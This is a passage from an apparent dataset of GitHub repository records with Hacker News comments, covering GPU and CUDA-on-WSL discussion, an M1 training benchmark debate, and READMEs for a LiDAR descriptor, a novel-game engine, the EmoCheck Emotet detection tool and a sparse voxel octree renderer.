screens, so there is quite a long way to go to catch up to peak monitor quality. Also, game developers are making games on the basis of the average configuration, not the other way around. I don't think anyone was wondering, and I don't think games are leaving GPU resources unused, but yes. Never mind the datasets - language models alone barely fit in memory on A100s. Can someone ELI5 what's the main difference between Nvidia 3000s, 3060, 3070, 3080, 3080Ti, 4000s, etc? 
I am just very confused about it and honestly I don't want to spend hours to understand something that should be immediately clear. You can downvote me for being lazy, yes. But my point is that there's a ton of BS marketing going on in the IT industry, and Nvidia is no exception. Look at the 3nm process, which isn't about gate distance anymore. Etc. Did you try playing at 8k with a top-of-the-line graphics card?\nDid you ever see 60FPS on the highest level of detail?\nDid you ever want 240FPS to avoid artifacts during a fast action game?\nDid you ever wonder how many graphics cards are needed for a three-monitor setup?\nDid you ever want a ray-traced action game?\nAll these questions need much more powerful GPUs than the current top-of-the-line.\nAnd game makers know that better graphics often sells the game. If you need larger batch sizes but don't have the VRAM for it, have a look at gradient accumulation (https://kozodoi.me/python/deep%20learning/pytorch/tutorial/2...). You can accumulate the gradients of multiple batches before doing the weight update step. This allows you to run effectively much larger batch sizes than your GPU would allow without it. A few months ago, I thought... ok, this is amazing, an i7 with 8 cores and 32 GB of RAM and an SSD... I'm set for the next decade! Now I'm just trying to run Stable Diffusion to generate things and it's 30 seconds per iteration at only 512x512 pixels. It looks like I'll have a GPU soon enough if I want to do any development with neural networks. What an amazing ride... heck, I still remember thinking back in 1980 that the 10 Megabyte Corvus hard drive my friend was installing for a business would NEVER be filled... do you have any idea how much typing that is? ;-)\n> when games don't need them\nSorry, but you are totally wrong. 4k + 144hz absolutely needs this kind of performance. Same as VR. What do you mean \"games don't need them\"? I have a 4K120 display I use on my computer. My 3070 can't play games from the past 7 years at this pixel clock. I'd be happier with 4K240. Games absolutely need more vector horsepower. Looks cool, but let me offer one point of critique: the website is very sparse. Indeed, too sparse for me to hack in my e-mail and risk getting it into yet another newsletter loop. I'd probably try to provide info on a few more benefits for the prospective user. Keen to give this a go, what version of tensorflow does it work with? Why a web service rather than fully client-side software? $$$ business model?\n> 21H2 cannot currently be updated to\nFWIW, I just checked on my system, and it totally had the option to download and update to 21H2. Which I'm currently running. So it is available to some systems. Seems great; why undervote it? Nice, thanks for sharing. Can you make a gist as well of this? I think Google and other search engines index public gists better than they do HN posts, will def help those searching around for a solution. Which WSL version does this apply to, 1 or 2? Why not just install any linux desktop + nvidia drivers? That's what all the historic stuff was written on. Also, much better to go with opencl than cuda for new developments these days (unless you are being funded in one of the nvidia startup programs). The man hours wasted just to perpetuate the entrenched old money empire of computer software boggles the mind. We are prisoners to this nonsense. It's so hard to watch.\n> * You MUST be on Windows 10 21H2 or above. 
21H2 cannot currently be updated to (yeah, it's because they are pushing Windows 11) so you need to download it as an ISO. You can also force an upgrade using Group Policy:\nhttps://www.tenforums.com/tutorials/159624-how-specify-targe... (this doesn't work on the Home edition though). If I may make some minor cleanup/style suggestions?\n* You can do the key fetch, populate both apt sources.list.d files, then do a single `apt-get update && apt-get install --yes` rather than 3 updates and 4 installs.\n* You're using both `apt` and `apt-get` and only using `--yes` once (obviously fixed by taking the previous point, but while I'm mentioning things...)\n* If all but the last two steps use sudo, maybe consider just making the first step `sudo su` and then `exit` when you're done (very context dependent, but does let you skip needing `sh -c` to populate files)\nNone of this is anything against you, just some possible improvements to have fewer steps and general stuff I'd mention in a normal code review. And full marks for, y'know, actually documenting it at all and sharing :) Did this a few weeks ago as part of the ~annual check to see if we finally support non-linux local dev for graphistry folks. Super promising, some tweaks:\n- WSL2. Kernel virtualization feels as native as advertised, e.g., docker in wsl2/ubuntu is fast like docker in native ubuntu, vs. the slowness that is docker in os x\n- Ubuntu 20.04 works, if I remember right\n- We don't worry as much about library-level versions b/c we run via docker\n- OpenCL does not work. There's some bits about intel & amd GPUs, but nada on nvidia\n- Many nvidia-smi diagnostics do not work... and many ecosystem libraries assumed they did for stuff like initialization & memory management & monitoring. Prepare for whackamole of updating pydata etc. dependencies to ~December+\n- TBD for GPU K8S; KinD/K3D seem likely via docker runtime passthrough, but minikube & friends seem riskier. Curious if anyone has that working in a non-painful setup, esp. w/ cross-container GPU sharing.\nWe still can't fully use+endorse WSL2 support for Nvidia hardware due to lack of even super minimal OpenCL versions, and risky core diagnostics surprises, but encouraging! (Good time to shout: if you're curious about end-to-end client/server GPU computing and already active on opengl/webgl, we're looking for someone into helping the next 100X of our viz engine!) Might want to add this: I updated to 21H2 this week by downloading a package from Microsoft.\nhttps://support.microsoft.com/en-us/topic/kb5003791-update-t... Been using it for a while and I'm extremely satisfied. Having an Ubuntu terminal on Windows with native performance made me uninstall a bunch of Windows stuff and now I'm back to my Unix working routine. Couldn't be happier, to be honest. I don't get why you won't just use Ubuntu or dual boot. 
Why WSL? Worth noting there are many different ways to get CUDA with WSL2 working. If you follow the MS docs, they do not mention anything about installing CUDA on the Linux VM, so you do not get a functional setup to start using CUDA; and if you follow Nvidia's documentation, they push you down the docker container route.\nI personally prefer to set up Tensorflow using Anaconda rather than pip. A slight correction to the OP: the special driver NVIDIA mentions is for CUDA only (no display driver included). Nvidia does not \"support\" installing their full display driver in WSL2, so YMMV in terms of reliability and performance. I personally gave up on WSL2, not because of WSL2, but because it is so hard to use remotely (I do not have frequent local access to my GPU workstation). I tried various instructions and WSL2 itself was fine when used locally (via remote desktop), but the networking scripts I found were unreliable, or if I used the Windows openssh server it kept crashing, and bash.exe is too limited to be useful; just not worth the hassle and effort when I can install Linux natively. Supposedly the right version of Windows 10 is hitting RTM builds here soon and will no longer be limited to dev channels. I don't use Windows anymore so I don't really have any investment in WSL, but I'm happy to keep seeing things in the WSL camp get even better. I'd argue WSL is the single best Windows innovation in years. Any reason to use the older LTS and not 20.04? There is no need to do the apt-key etc... the toolkit is already in the packages in newer versions of ubuntu. Install the cuda driver: https://developer.nvidia.com/cuda/wsl Install an ubuntu image using wsld (wsld -i ubuntu -d cuda -o D:\\.wsl2), then apt update && apt install nvidia-cuda-toolkit. Done. For installing cudnn it may be better to go to the installation guide: https://docs.nvidia.com/deeplearning/cudnn/install-guide/ind... Does it mean that I can play games inside WSL so I don't have to install them on the host? Why does this not work on Windows 11? WSL is so much extra work to maintain. I absolutely love running Ubuntu LTS as my daily OS. I use Wine to run Photoshop CC 2018 and Illustrator CC 2019, Nvidia drivers work excellently on Linux these days, and all my development tools just work. I dread the day I have to depend on anything else. We are not better off with CUDA working in my WSL. That keeps us confined to NVIDIA. It suffices to have full Vulkan support. Then we can use Kompute, which is portable to any GPU, not just NVIDIA. Sounds like AWS Sagemaker, no? Except this isn't cloud based, and they also do optimizations on the model itself via AOT compilation. Can you describe an example of your target user/application?\n> I chose MobileNetV2 to make iteration faster. When I tried ResNet50 or other larger models the gap between the M1 and Nvidia grew wider.
compared with the $900 mac mini.Betteridge says no.no reading if it is forced to use js. your ideas does not even matter if you wish me to use js to just learn what your ideas are.Well, putting out a tl;dr and then a graph that does not mention FP16/FP32 performance differences or anything related to TensorRT cannot be taken seriously if we talk about performance per watt. We need to see the a comparison that includes multiple scenarios so we can determine something like a break-even point between Nvidia GPUs and Apple M1 GPU, possibly even for several SotA models.No, but it's pretty good at retraining the final layer of low memory networks like MobileNet - weirdly a workload that the V100 is very poorly suited for...This is on a model designed to run faster on CPUs. It's like dropping a bowling ball on your foot and claiming excitement that you feel bruised after a few days.Maybe there's something interesting there, definitely, but the overhype of the title takes away any significant amount of clout I'd give to the publishers for research. If you find something interesting, say it, and stop making vapid generalizations for the sake of more clicks.Remember, we only can feed the AI hype bubble when we do this. It might be good results, but we need to be at least realistic about it, or there won't be an economy of innovation for people to listen to in the future, because they've tuned it out with all of the crap marketing that comes/came before it.Thanks for coming to my TED Talk!The first graph includes \"Apple Intel\", which is not mentioned anywhere else in the post. Any idea what hardware that was, and whether it used the accelerated TensorFlow?When developing ML models, you rarely train \"just one\".The article mentions that they explored a not-so-large hyper-parameter space (i.e. they trained multiple models with different parameters each).It would be interesting to know how long does the whole process takes on the M1 vs the V100.For the small models covered in the article, I'd guess that the V100 can train them all concurrently using MPS (multi-process service: multiple processes can concurrently use the GPU).In particular it would be interesting to know, whether the V100 trains all models in the same time that it trains one, and whether the M1 does the same, or whether the M1 takes N times more time to train N models.This could paint a completely different picture, particularly for the user perspective. When I go for lunch, coffee, or home, I usually spawn jobs training a large number of models, such that when I get back, all these models are trained.I only start training a small number of models at the latter phases of development, when I have already explored a large part of the model space.---To make the analogy, what this article is doing is something similar to benchmarking a 64 core CPU against a 1 core CPU using a single threaded benchmark. The 64 core CPU happens to be slightly beefier and faster than the 1 core CPU, but it is more expensive and consumes more power because... it has 64x more cores. So to put things in perspective, it would make sense to also show a benchmark that can use 64x cores, which is the reason somebody would buy a 64-core CPU, and see how the single-core one compares (typically 64x slower).---To me, the only news here is that Apple GPU cores are not very far behind NVIDIA's cores for ML training, but there is much more to a GPGPU than just the perf that you get for small models in a small number of cores. 
Apple would still need to (1) catch up, and (2) extremely scale up their design. They probably can do both if they set their eyes on it. Exciting times.CPUs often outperform specialized hardware on small models. This is nothing new. You'd need to go to a larger model, and then power consumption curves change too.I'm seeing a lot of M1 hype, and I suspect most of it us unwarranted. I looked at comparisons between the M1 and the latest Ryzens, and it looks like it's comparable? Does anyone know details? I only looked summarily.I categorize this as an exploration of how to benchmark desktop/workstation NPUs [1] similar to the exploration Daniel Lemire started with SIMD. Mobile SoC NPUs are used to deploy inference models on smartphones and IoT devices while discreet NPUs like Nvidia A100/V100 target cloud clusters.We don\u2019t have apples-to-apples benchmarks like SPECint/SPECfp for the SoC accelerators in the M1 (GPU, NPU, etc.) so these early attempts are both facile and critical as we try to categorize and compare the trade-offs between the SoC/discreet and performance/perf-per-watt options available.Power efficient SoC for desktops is new and we are learning as we go.[1] https://en.m.wikipedia.org/wiki/AI_acceleratorOne thing I haven\u2019t seen much mention of is getting things to run on the M1\u2019s neural engine instead of the GPU - it seems like the neural engine has ~3x more compute capacity and is specifically optimized for this type of computation.Has anyone spotted any work allowing a mainstream tensor library (e.g. jax, tf, pytorch) to run on the neural engine?I had the same experience. My M1 system does well on smaller models compared to a NVidia 1070 with 10GB of memory. My MacBook Pro only has 8GB total memory. Large models run slowly.I found setting up Apple\u2019s M1 fork of TensorFlow to be fairly easy, BTW.I am writing a new book on using Swift for AI applications, motivated by the \u201cniceness\u201d of the Swift language and Apple\u2019s CoreML libraries.\"trainable_params 12,810\"laughs(for comparison, GPT3: 175,000,000,000 parameters)Can Apple's M1 help you train tiny toy examples with no real-world relevance? You bet it can!Plus it looks like they are comparing Apples to Oranges ;) This seems to be 16 bit precision on the M1 and 32 bit on the V100. So the M1-trained model will most likely yield worse or unusable results, due to lack of precision.And lastly, they are plainly testing against the wrong target. The V100 is great, but it is far from NVIDIA's flagship for training small low-precision models. At the FP16 that the M1 is using, the correct target would have been an RTX 3090 or the like, which has 35 TFLOPS. The V100 only gets 14 TFLOPS because it lacks the dedicated TensorRT accelerator hardware.So they compare the M1 against an NVIDIA model from 2017 that lacks the relevant hardware acceleration and, thus, is a whopping 60% slower than what people actually use for such training workloads.I'm sure my bicycle will also compare very favorably against a car that is lacking two wheels :p", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "irapkaist/scancontext", "link": "https://github.com/irapkaist/scancontext", "tags": [], "stars": 635, "description": "Global LiDAR descriptor for place recognition and long-term localization", "lang": "C++", "repo_lang": "", "readme": "\n\n# Scan Context\n\n## NEWS (Oct, 2021): Scan Context++ is accepted for T-RO!\n- Our extended study named Scan Context++ is accepted for T-RO. 
\n    - Scan Context++: Structural Place Recognition Robust to Rotation and Lateral Variations in Urban Environments\n    - [Paper](https://arxiv.org/pdf/2109.13494.pdf), [Summary](https://threadreaderapp.com/thread/1443044133937942533.html), [Video](https://youtu.be/ZWEqwYKQIeg)\n- The additional evaluation code (e.g., lateral evaluations on the Oxford Radar RobotCar dataset) with the new metric (we call it recall distribution based on KL-D) will be added soon. \n\n## Note\n- Scan Context can be easily integrated with any LiDAR odometry algorithm or any LiDAR sensor. Examples are:\n    - Integrated with A-LOAM: [SC-A-LOAM](https://github.com/gisbi-kim/SC-A-LOAM)\n    - Integrated with LeGO-LOAM: [SC-LeGO-LOAM](https://github.com/irapkaist/SC-LeGO-LOAM)\n    - Integrated with LIO-SAM: [SC-LIO-SAM](https://github.com/gisbi-kim/SC-LIO-SAM)\n    - Integrated with FAST-LIO2: [FAST_LIO_SLAM](https://github.com/gisbi-kim/FAST_LIO_SLAM)\n    - Integrated with a basic ICP odometry: [PyICP-SLAM](https://github.com/gisbi-kim/PyICP-SLAM)\n        - This implementation is fully Python-based, so it is slow, but it serves an educational purpose. \n        - If you need a fast Python API for Scan Context, use [https://github.com/gisbi-kim/scancontext-pybind](https://github.com/gisbi-kim/scancontext-pybind)\n- Scan Context also works for radar.\n    - Integrated with yeti-radar-odometry for radar SLAM: [navtech-radar-slam](https://github.com/gisbi-kim/navtech-radar-slam)\n    - P.S. See the ``fast_evaluator_radar`` directory for the radar place recognition evaluation (the radar scan context was introduced in the [MulRan dataset](https://sites.google.com/view/mulran-pr/home) paper).\n\n## NEWS (April, 2020): C++ implementation\n- C++ implementation released!\n    - See the directory `cpp/module/Scancontext`\n    - Features \n        - Light-weight: a single header and cpp file named \"Scancontext.h\" and \"Scancontext.cpp\"\n        - Our module includes a KD-tree; we used nanoflann, which is also a single-header library, and that file is included in our directory.\n        - Easy to use: a user only needs to remember two API functions, `makeAndSaveScancontextAndKeys` and `detectLoopClosureID` (see the sketch below).\n        - Fast: the loop detector was tested running at 10-15 Hz (for a 20 x 60 descriptor, 10 candidates)\n    - Example: Real-time LiDAR SLAM\n        - We integrated the C++ implementation with recent popular LiDAR odometry codebases (e.g., LeGO-LOAM and A-LOAM).\n        - That is, LiDAR SLAM = LiDAR odometry (LeGO-LOAM) + loop detection (Scan Context) and closure (GTSAM)\n        - For details, see `cpp/example/lidar_slam` or refer to these repositories: SC-LeGO-LOAM or SC-A-LOAM.
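As a rough illustration of that two-function API, here is a minimal C++ sketch. It assumes the `SCManager` class declared in `Scancontext.h` and PCL point types, as used in the example integrations above; exact names and signatures may differ between versions.

```cpp
#include "Scancontext.h"        // from cpp/module/Scancontext
#include <pcl/point_cloud.h>
#include <pcl/point_types.h>
#include <utility>

int main() {
    SCManager scManager;        // Scan Context database + loop detector

    // For every new keyframe produced by a LiDAR odometry front-end:
    pcl::PointCloud<pcl::PointXYZI> scan;   // assumed filled with a downsampled scan
    scManager.makeAndSaveScancontextAndKeys(scan);

    // Query the database: returns the matched keyframe index (-1 if no loop)
    // and a coarse relative yaw that can be used to initialize ICP.
    std::pair<int, float> loop = scManager.detectLoopClosureID();
    if (loop.first != -1) {
        // add a loop-closure constraint between the current keyframe and
        // keyframe loop.first in a pose-graph back-end such as GTSAM
    }
    return 0;
}
```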
---\n\n\n- Scan Context is a global descriptor for LiDAR point clouds; it was proposed in this paper, and its details are summarized in this video.\n\n```\n@ARTICLE { gskim-2021-tro,\n    AUTHOR = { Giseop Kim and Sunwook Choi and Ayoung Kim },\n    TITLE = { Scan Context++: Structural Place Recognition Robust to Rotation and Lateral Variations in Urban Environments },\n    JOURNAL = { IEEE Transactions on Robotics },\n    YEAR = { 2021 },\n    NOTE = { Accepted. To appear. },\n}\n\n@INPROCEEDINGS { gkim-2018-iros,\n  author = {Kim, Giseop and Kim, Ayoung},\n  title = { Scan Context: Egocentric Spatial Descriptor for Place Recognition within {3D} Point Cloud Map },\n  booktitle = { Proceedings of the IEEE/RSJ International Conference on Intelligent Robots and Systems },\n  year = { 2018 },\n  month = { Oct. },\n  address = { Madrid }\n}\n```\n- This point cloud descriptor is used for place retrieval problems such as place\nrecognition and long-term localization.\n\n\n## What is Scan Context?\n\n- Scan Context is a global descriptor for LiDAR point clouds, especially designed for sparse and noisy point clouds acquired in outdoor environments.\n- It encodes egocentric visible information as below:\n

\n\n- A user can vary the resolution of a Scan Context. Below is an example of Scan Contexts at various resolutions for the same point cloud.\n

\n\n\n## How to use?: example cases\n- This repository is organized around example use cases.\n- Most of the code is written in Matlab.\n- The directory _matlab_ contains the main functions, including Scan Context generation and the distance function.\n- The directory _example_ contains full example code for a few applications. We provide a total of 4 examples.\n 1. _**basics**_ contains literally basic code, such as descriptor generation, and is a good starting point for understanding Scan Context.\n\n 2. _**place recognition**_ is an example directory for our IROS18 paper. The example is conducted using KITTI sequence 00, and PlaceRecognizer.m is the main code. You can easily grasp the full pipeline of Scan Context-based place recognition by reading and following the PlaceRecognizer.m code. Our Scan Context-based place recognition system consists of two steps: description and search. The search step is composed of two hierarchical stages (1. a ring-key-based KD tree for fast candidate proposal, 2. pairwise candidate-to-query comparison-based nearest search; see the distance-function sketch after this list). We note that our coarse yaw-aligning pairwise distance enables reverse-revisit detection well, unlike others. The pipeline is below.\n

\n\n 3. _**long-term localization**_ is an example directory for our RAL19 paper. To separate mapping and localization, there are separate train and test steps. The main training and test codes are written in Python and Keras (only the data generation and performance evaluation codes are written in Matlab), and the Python codes are provided as Jupyter notebooks. We note that some paths may not directly work in your environment, but the evaluation codes (e.g., makeDataForPRcurveForSCIresult.m) will help you understand how this classification-based SCI-localization system works. The figure below depicts our long-term localization pipeline.

More details of our long-term localization pipeline are found in the paper below, and we also recommend watching this video.\n```\n@ARTICLE{ gkim-2019-ral,\n    author = {G. {Kim} and B. {Park} and A. {Kim}},\n    journal = {IEEE Robotics and Automation Letters},\n    title = {1-Day Learning, 1-Year Localization: Long-Term LiDAR Localization Using Scan Context Image},\n    year = {2019},\n    volume = {4},\n    number = {2},\n    pages = {1948-1955},\n    month = {April}\n}\n```\n\n 4. The _**SLAM**_ directory contains a practical use case of Scan Context in a SLAM pipeline. The details are maintained in the related repository _[PyICP SLAM](https://github.com/kissb2/PyICP-SLAM)_, a full-Python LiDAR SLAM codebase using Scan Context as a loop detector.
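To make the search stage above concrete, here is an illustrative sketch of the coarse yaw-aligning pairwise distance described in the papers: a column-shifted, column-wise cosine distance between two Scan Context matrices. This is an Eigen-based illustration of the idea, not the repository's Matlab or C++ code:

```cpp
#include <Eigen/Dense>
#include <algorithm>
#include <limits>

// Distance between two Scan Contexts (rows = rings, cols = sectors).
// Tries every column shift (a coarse yaw alignment) and keeps the minimum
// mean column-wise cosine distance; smaller means more likely the same place.
double scanContextDistance(const Eigen::MatrixXd& sc1, const Eigen::MatrixXd& sc2) {
    const int numSectors = static_cast<int>(sc1.cols());
    double best = std::numeric_limits<double>::max();
    for (int shift = 0; shift < numSectors; ++shift) {
        double sum = 0.0;
        int cnt = 0;
        for (int c = 0; c < numSectors; ++c) {
            const Eigen::VectorXd a = sc1.col(c);
            const Eigen::VectorXd b = sc2.col((c + shift) % numSectors);
            const double na = a.norm(), nb = b.norm();
            if (na == 0.0 || nb == 0.0) continue;   // skip empty sectors
            sum += 1.0 - a.dot(b) / (na * nb);      // column-wise cosine distance
            ++cnt;
        }
        if (cnt > 0) best = std::min(best, sum / cnt);
    }
    return best;
}
```

Minimizing over all column shifts is what makes the distance robust to rotation (and hence able to detect reverse revisits); the ring-key KD tree is only used beforehand to shortlist candidates cheaply.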
\n## Acknowledgment\nThis work is supported by the Korea Agency for Infrastructure Technology Advancement (KAIA) grant funded by the Ministry of Land, Infrastructure and Transport of Korea (19CTAP-C142170-02), and [High-Definition Map Based Precise Vehicle Localization Using Cameras and LIDARs] project funded by NAVER LABS Corporation.\n\n## Contact\nIf you have any questions, please contact\n ```\n paulgkim@kaist.ac.kr\n ```\n\n## License\nThis work is licensed under a Creative Commons Attribution-NonCommercial-ShareAlike 4.0 International License.\n\n### Copyright \n- All code on this page is copyrighted by KAIST and Naver Labs and published under the Creative Commons Attribution-NonCommercial-ShareAlike 4.0 License. You must attribute the work in the manner specified by the author. You may not use the work for commercial purposes, and if you alter, transform, or build upon the work, you may only distribute the resulting work under the same license.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "krkrz/krkrz", "link": "https://github.com/krkrz/krkrz", "tags": ["novel", "game", "engine", "windows", "android"], "stars": 635, "description": "Kirikiri Z Project", "lang": "C++", "repo_lang": "", "readme": "# Kirikiri Z\n\nKirikiri Z is a Kirikiri 2 fork project.\n\n2016/08/18\nThe splitting of the repository is complete.\nPlugins that have not yet been added will be added by their respective authors.\nThe external libraries in `external` are now submodules.\nIf the folders in `external` are empty, update the submodules.\nIn the future, the directory structure may change as the Android version is developed.\n\n2016/08/09\nEverything other than the engine itself, including all plugins, has been removed; only the source code of the main engine is now in this repository.\nSee the branches for the old directory structure.\n\nA repository containing everything close to the old configuration is now .\nEach plug-in is referenced as a submodule and managed independently.", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "JPCERTCC/EmoCheck", "link": "https://github.com/JPCERTCC/EmoCheck", "tags": ["security", "malware-detection", "emotet"], "stars": 634, "description": "Emotet detection tool for Windows OS", "lang": "C++", "repo_lang": "", "readme": "# EmoCheck\n\n[![GitHub release](https://img.shields.io/github/release/jpcertcc/emocheck.svg)](https://github.com/jpcertcc/emocheck/releases)\n[![Github All Releases](https://img.shields.io/github/downloads/jpcertcc/emocheck/total.svg)](https://somsubhra.github.io/github-release-stats/?username=jpcertcc&repository=emocheck&page=1&per_page=5)\n\nEmotet detection tool for Windows OS\n\n## How to use\n\n1. Download the tool from Releases\n2. Run the tool on suspected infected hosts\n3. 
Check the output report\n\n## Download\n\nYou can download the tool from the page below.\n\n [Releases](https://github.com/JPCERTCC/EmoCheck/releases)\n\n## Command options\n\n(added in v0.0.2)\n\n- Specify the report output directory (default: current directory)\n  - `/output [output directory]` or `-output [output directory]`\n- Suppress command-line output\n  - `/quiet` or `-quiet`\n- Output the report in JSON format\n  - `/json` or `-json`\n- Verbose display (no report output)\n  - `/debug` or `-debug`\n- Display help\n  - `/help` or `-help`\n\n## How to detect Emotet\n\nEmoCheck detects the Emotet process from the list of processes on the host.\n\n## Report example\n\nWhen Emotet is detected, a report similar to the one below is generated.\n\nText format: \n\n```txt\n[Emocheck v0.0.2]\nProgram execution time: 2020-02-10 10:45:51\n____________________________________________________\n\n[result]\nEmotet detected\n\n[detail]\n Process name   : mstask.exe\n Process ID: 716\n Image path: C:\\Users\\[username]\\AppData\\Local\\mstask.exe\n____________________________________________________\n\nQuarantine/delete executables in suspicious image paths.\n```\n\nJSON format (added in v0.0.2):\n\n```json\n{\n \"scan_time\":\"2020-02-10 10:45:51\",\n \"hostname\":\"[hostname]\",\n \"emocheck_version\":\"0.0.2\",\n \"is_infected\": \"yes\",\n \"emotet_processes\":[\n  {\n   \"process_name\":\"mstask.exe\",\n   \"process_id\":\"716\",\n   \"image_path\": \"C:\\\\Users\\\\[username]\\\\AppData\\\\Local\\\\mstask.exe\"\n  }\n ]\n}\n```\n\nThe report will be generated at the following paths.\n\n(v0.0.1)\n`[current directory]\\yyyymmddhhmmss_emocheck.txt`\n\n(v0.0.2 or later)\n`[specified directory]\\[host name]_yyyymmddhhmmss_emocheck.txt`\n`[specified directory]\\[host name]_yyyymmddhhmmss_emocheck.json`\n\n## Screenshot\n\n(v0.0.1)\n
\n\n## Change log\n\n- (2020/02/03) v0.0.1\n- (2020/02/10) v0.0.2\n  - Added detection method\n  - Added command options\n- (2020/08/11) v1.0.0\n  - Added detection method\n- (2021/01/27) v2.0.0\n  - Added detection method\n  - Added French support\n- (2022/03/04) v2.1.0\n  - Added detection method\n- (2022/03/14) v2.1.1\n  - Fixed a bug where checks did not run correctly when executed with system privileges\n- (2022/04/22) v2.2.0\n  - Added detection method\n- (2022/05/20) v2.3.0\n  - Added detection method\n- (2022/05/24) v2.3.1\n  - Fixed detection method\n- (2022/05/27) v2.3.2\n  - Fixed detection method\n\n## License\n\nPlease check the following page for the license.\n\n [LICENSE](https://github.com/JPCERTCC/EmoCheck/blob/master/LICENSE.txt)\n\n## Others\n\n### Tested environments\n\n- Windows 11 21H2 64bit Japanese version\n- Windows 10 21H2 64bit Japanese version\n- Windows 8.1 64bit Japanese version\n- ~~Windows 7 SP1 32bit Japanese version~~\n- ~~Windows 7 SP1 64bit Japanese version~~\n\n### Build environment\n\n- Windows 10 1809 64bit Japanese version\n- Microsoft Visual Studio Community 2017\n\n### Source code\n\nThe source code has not been published since v2.1.", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "tunabrain/sparse-voxel-octrees", "link": "https://github.com/tunabrain/sparse-voxel-octrees", "tags": [], "stars": 634, "description": "CPU Sparse Voxel Octree Implementation", "lang": "C++", "repo_lang": "", "readme": "![XYZRGB Dragon](https://raw.github.com/tunabrain/sparse-voxel-octrees/master/Header.png)\n\nSparse Voxel Octrees\n=========\n\nThis project provides a multithreaded, CPU Sparse Voxel Octree implementation in C++, capable of raytracing large datasets in real-time, converting raw voxel files to octrees and converting mesh data (in the form of PLY files) to voxel octrees.\n\nThe conversion routines are capable of handling datasets much larger than the working memory, allowing the creation and rendering of very large octrees (resolution 8192x8192x8192 and up).\n\nThis implementation closely follows the paper [Efficient Sparse Voxel Octrees](https://research.nvidia.com/publication/efficient-sparse-voxel-octrees) by Samuli Laine and Tero Karras.\n\nThe XYZRGB dragon belongs to the Stanford 3D Scanning Repository and is available from [their homepage](http://graphics.stanford.edu/data/3Dscanrep/) \n\nCompilation\n===========\n\nA recent compiler supporting C++11, CMake 2.8 and SDL 1.2 are required to build.\n\nTo build on Linux, you can use the `setup_builds.sh` shell script to setup build and release configurations using CMake. After running `setup_builds.sh`, run `make` inside the newly created `build/release/` folder. Alternatively, you can use the standard CMake CLI to configure the project.\n\nTo build on Windows, you will need Visual Studio 2013 or later. Before running CMake, make sure that\n\n* CMake is on the `PATH` environment variable. An easy check to verify that this is the case is to open CMD and type `cmake`, which should output the CMake CLI help.\n* You have Windows 64bit binaries of SDL 1.2. These are available [here](https://www.libsdl.org/download-1.2.php). Make sure to grab the `SDL-devel-1.2.XX-VC.zip`. Note that if you are using a newer version of Visual Studio, you may need to compile SDL yourself in order to be compatible. 
Please see the SDL website for details.\n* The environment variable `SDLDIR` exists and is set to the path of the folder containing SDL 1.2 (you will have to set it up manually; it needs to be a system environment variable, not a user variable, for CMake to find it). CMake will use this variable to find the relevant SDL files and configure MSVC to use them.\n\nAfter these prerequisites are set up, you can run `setup_builds.bat` to create the Visual Studio files. It will create a folder `vstudio` containing the `sparse-voxel-octrees.sln` solution.\n\nAlternatively, you can also run CMake manually or set up the MSVC project yourself, without CMake. The sources don't require special build flags, so the latter is easily doable if you can't get CMake to work.\n\nTo build on macOS, you will need to install SDL first (i.e. `brew install sdl`). Then build it like a regular CMake project:\n\n    mkdir build\n    cd build\n    cmake ../\n    make\n    ./sparse-voxel-octrees -viewer ../models/XYZRGB-Dragon.oct\n\nOn macOS, you may need to click+drag within the application window first to make the render visible.\n\nNote: If building fails on macOS, you can try commenting out the following lines in CMakeLists.txt\n\n    #if (${CMAKE_SYSTEM_NAME} MATCHES \"Darwin\")\n    #    set(Sources ${Sources} \"src/SDLMain.m\")\n    #endif()\n\nUsage\n=====\n\nOn startup, the program will load the sample octree and render it. Left mouse rotates the model, right mouse zooms. Escape quits the program. To make CLI arguments easier on Windows, you can use run_viewer.bat to start the viewer.\n\nNote that due to repository size considerations, the sample octree has poor resolution (256x256x256). You can generate larger octrees using the code, however. See Main.cpp:initScene for details. You can also use run_builder.bat to build the XYZ RGB dragon model. To do this, simply download the XYZ RGB dragon model from http://graphics.stanford.edu/data/3Dscanrep/ and place it in the models folder.\n\nCode\n====\n\nMain.cpp controls application setup, thread spawning and basic rendering (this should move into a different file at some point).\n\nVoxelOctree.cpp provides routines for octree raymarching as well as generating, saving and loading octrees. It uses VoxelData.cpp, which robustly handles fast access to non-square, non-power-of-two voxel data not completely loaded in memory.\n\nThe VoxelData class can also pull voxel data directly from PlyLoader.cpp, generating data from triangle meshes on demand instead of from file, which vastly improves conversion performance due to the elimination of file I/O.
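For readers unfamiliar with the ESVO-style layout the octree code follows, here is a generic sketch of how such sparse octree nodes are commonly packed. It is an illustration of the paper's idea under assumed field names, not the repository's actual data structures:

```cpp
#include <cstdint>

// Generic ESVO-style sparse octree node (illustrative, not this repo's layout):
// an 8-bit mask records which of the 8 children exist, another marks leaves,
// and all existing children are stored contiguously in a flat node pool.
struct OctreeNode {
    uint8_t  childMask;    // bit i set => child i exists
    uint8_t  leafMask;     // bit i set => child i is a leaf voxel
    uint32_t firstChild;   // pool index of the first existing child
};

// Locate child slot 'i' (0-7) by counting existing children before it,
// so empty space costs no memory and lookups stay O(1).
// (__builtin_popcount is a GCC/Clang builtin.)
inline uint32_t childIndex(const OctreeNode& n, int i) {
    const uint32_t before = n.childMask & ((1u << i) - 1u);
    return n.firstChild + static_cast<uint32_t>(__builtin_popcount(before));
}
```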
